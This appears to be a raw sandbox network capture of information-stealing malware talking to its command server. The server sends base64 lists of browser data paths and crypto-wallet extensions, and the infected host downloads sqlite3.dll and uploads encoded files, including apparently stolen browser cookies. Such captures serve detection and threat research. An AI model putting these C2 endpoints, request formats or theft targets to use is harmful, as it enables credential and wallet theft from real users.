Sep 26, 2024 02:40:08.922405005 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:08 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 02:40:08.922430038 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 02:40:08.923772097 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDH Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="message"plugins------FBAFIIJKJEGIDGDGIIDH--
Sep 26, 2024 02:40:09.151918888 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 02:40:09.151937008 CEST	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Sep 26, 2024 02:40:09.151963949 CEST	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Sep 26, 2024 02:40:09.151978016 CEST	224	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpn
Sep 26, 2024 02:40:09.152153015 CEST	1236	IN	Data Raw: 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 35 6f 63 47 31 75 61 6d 5a 6d 59 32 39 6d 61 6d 39 75 59 6d Data Ascii: b2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGR
Sep 26, 2024 02:40:09.152215958 CEST	1236	IN	Data Raw: 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 Data Ascii: Ym1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGh
Sep 26, 2024 02:40:09.152231932 CEST	1236	IN	Data Raw: 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 Data Ascii: YWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGR
Sep 26, 2024 02:40:09.152297020 CEST	816	IN	Data Raw: 61 47 68 38 4d 58 77 77 66 44 42 38 56 6d 56 75 62 32 30 67 56 32 46 73 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 Data Ascii: aGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWN
Sep 26, 2024 02:40:09.155127048 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAE Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"fplugins------HIIIJDAAAAAAKECBFBAE--
Sep 26, 2024 02:40:09.382210016 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 02:40:09.400051117 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF Host: 185.215.113.37 Content-Length: 5751 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 02:40:09.400118113 CEST	5751	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 02:40:11.255348921 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:11.256876945 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:11.259038925 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:11.262213945 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:11.512231112 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:11.737643957 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 02:40:11.737679958 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 02:40:12.874856949 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHC Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------AKEGDHJDHDAFHJJKJEHC--
Sep 26, 2024 02:40:13.624697924 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:13.742096901 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; 